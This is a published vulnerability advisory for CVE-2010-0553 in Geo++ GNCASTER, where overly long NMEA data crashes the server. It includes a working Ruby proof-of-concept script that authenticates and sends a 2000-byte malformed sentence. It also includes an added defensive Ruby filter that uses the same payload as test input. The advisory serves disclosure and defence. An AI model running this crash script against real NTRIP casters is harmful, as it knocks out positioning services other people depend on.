
Geo++(R) GNCASTER: Insecure handling of NMEA data

During a penetration test, RedTeam Pentesting discovered that the GNCaster software does not handle NMEA data correctly. An attacker with valid login credentials can use this to crash the server software or potentially execute code on the server.

Details

  • Product: Geo++(R) GNCASTER
  • Affected Versions: <= 1.4.0.7
  • Fixed Versions: 1.4.0.8
  • Vulnerability Type: Memory corruption
  • Security Risk: medium
  • Vendor URL: http://www.geopp.de
  • Vendor Status: notified
  • Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2010-002
  • Advisory Status: published
  • CVE: CVE-2010-0553
  • CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0553

Introduction

“Geo++(R) GNCASTER is the Geo++ implementation of a NTRIP caster. NTRIP is a protocol within RTCM to provide GNSS information via Internet.”

(from the vendor’s homepage)

More Details

After logging in, the GNCaster server software allows the user to receive data streams. For some of these streams, the user can send so-called NMEA data to the server to specify the user's geographical position. If an attacker sends an overly long data string, the server software crashes. RedTeam Pentesting believes it is also possible to exploit this vulnerability to execute code on the server.

Proof of Concept

The following Ruby script can be used to crash the GNCaster server:

#!/usr/bin/env ruby
########################################
###                                    #
###  RedTeam Pentesting GmbH           #
###  kontakt@redteam-pentesting.de     #
###  https://www.redteam-pentesting.de #
###                                    #
########################################

require 'socket'
require 'base64'

if ARGV.length < 3 then
    puts "USAGE: %s host:port user:password stream" % __FILE__
    puts "Example: %s 127.0.0.1:2101 testuser:secret /0001" % __FILE__
    puts
    exit
end

host, port = ARGV[0].split(':')
pw, stream = ARGV[1..2]

begin
    puts "requesting stream %s" % stream.inspect
    sock = TCPSocket.new(host, port.to_i)
    # NTRIP stream request: an HTTP GET with HTTP basic authentication
    sock.write("GET %s HTTP/1.1\r\n" % stream)
    sock.write("Authorization: Basic %s\r\n" % Base64.encode64(pw).strip)
    sock.write("\r\n")

    response = sock.readline

    puts "server response: %s" % response.inspect

    # overly long NMEA sentence that the server does not handle correctly
    puts "sending modified nmea data"
    sock.write("$GP" + "A" * 2000 +
        "GGA,134047.00,5005.40000000,N,00839.60000000," +
        "E,1,05,0.19,+00400,M,47.950,M,,*69\r\n")
    puts "done"
rescue SystemCallError, EOFError => e
    puts "error: %s" % e.message
ensure
    sock.close if sock
end

Workaround

A vulnerable server can be protected by an application-layer firewall or filtering proxy that rejects overly long NMEA data before it reaches GNCASTER.
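As an added example (not part of the original advisory, and neither GNCASTER nor RedTeam Pentesting code), the following Ruby script shows the kind of check such a filter would apply: it rejects any sentence longer than the 82-byte limit from NMEA 0183 before parsing it at all, then validates the sentence structure and the XOR checksum. The function names, the sample sentences and the 16-byte preview kept in the rejection record are constructed for this example; the length limit and checksum rule come from the NMEA 0183 specification.

```ruby
#!/usr/bin/env ruby
# Added example, not part of the original advisory or of GNCASTER:
# an application-layer check that rejects NMEA sentences which are overly
# long or malformed before they are forwarded to the caster. NMEA 0183
# limits a sentence to 82 bytes including the leading '$' and the trailing
# CR/LF and defines the checksum as the XOR of all bytes between '$' and '*';
# everything else here (names, sample data) is constructed for the example.

NMEA_MAX_LEN = 82

# '$' + two-letter talker id + three-letter sentence type, comma-separated
# fields, '*' + two hex checksum digits, optional CR/LF.
NMEA_PATTERN = /\A\$([A-Z]{2})([A-Z]{3}),([^$*\r\n]*)\*([0-9A-F]{2})(?:\r\n)?\z/

# XOR of every byte between '$' and '*'.
def nmea_checksum(body)
  body.each_byte.reduce(0) { |acc, b| acc ^ b }
end

# Returns :ok for an acceptable sentence, otherwise a symbol naming the
# reason for rejection. Length is checked first, so an oversized blob is
# dropped without ever being parsed.
def classify_nmea(sentence)
  return :too_long unless sentence.bytesize <= NMEA_MAX_LEN
  return :non_ascii unless sentence.ascii_only?
  m = NMEA_PATTERN.match(sentence)
  return :malformed unless m
  talker, type, fields, given = m.captures
  expected = nmea_checksum("#{talker}#{type},#{fields}")
  return :bad_checksum unless expected == given.to_i(16)
  :ok
end

# Splits inbound lines into accepted sentences and rejected ones (with the
# reason and a short preview), as a filtering proxy would before forwarding.
def filter_nmea_lines(lines)
  accepted = []
  rejected = []
  lines.each do |line|
    reason = classify_nmea(line)
    if reason == :ok
      accepted << line
    else
      rejected << [reason, line[0, 16]]
    end
  end
  { accepted: accepted, rejected: rejected }
end

if __FILE__ == $0
  # Constructed sample input: the standard GGA example sentence, the
  # oversized sentence shape from the proof of concept above, a sentence
  # with a wrong checksum, and a line that is not NMEA at all.
  sample = [
    "$GPGGA,123519,4807.038,N,01131.000,E,1,08,0.9,545.4,M,46.9,M,,*47\r\n",
    "$GP" + "A" * 2000 +
      "GGA,134047.00,5005.40000000,N,00839.60000000,E,1,05,0.19,+00400,M,47.950,M,,*69\r\n",
    "$GPGGA,123519,4807.038,N,01131.000,E,1,08,0.9,545.4,M,46.9,M,,*00\r\n",
    "GET /0001 HTTP/1.1\r\n",
  ]
  result = filter_nmea_lines(sample)
  puts "accepted: #{result[:accepted].size}"
  result[:rejected].each { |reason, head| puts "rejected (#{reason}): #{head.inspect}" }
end
```

Checking the length before anything else is the point of the filter: a single oversized sentence is discarded on arrival, so the caster never sees it. The structure and checksum checks are a cheap addition that also drops corrupted or non-NMEA input on the same path.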

Fix

Update GNCASTER to version 1.4.0.8.

Security Risk

As an attacker needs valid user credentials for this attack, the risk of this vulnerability is regarded as medium. If streams that use NMEA data are publicly available, the risk should be considered high.

History

  • 2009-07-07 Vulnerability identified during a penetration test
  • 2009-07-14 Meeting with customer
  • 2009-12-01 Vendor releases fixed version
  • 2010-01-27 Advisory released
  • 2011-09-07 CVE information added

RedTeam Pentesting GmbH

RedTeam Pentesting offers individual penetration tests (pentests for short), performed by a team of specialised IT security experts. In this way, security weaknesses in company networks or products are uncovered and can be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants to share its knowledge and enhance public knowledge through research in security-related areas. The results are made available as public security advisories.

More information about RedTeam Pentesting can be found at https://www.redteam-pentesting.de.